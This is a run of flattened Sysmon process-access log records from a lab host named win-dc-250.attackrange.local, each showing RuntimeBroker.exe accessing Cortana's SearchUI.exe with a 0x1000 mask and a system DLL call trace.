13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012162Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012161Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012160Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012159Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012158Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012157Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012156Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012155Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012154Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012153Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012152Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012151Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012150Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012149Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012148Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012147Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012146Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012145Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012144Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 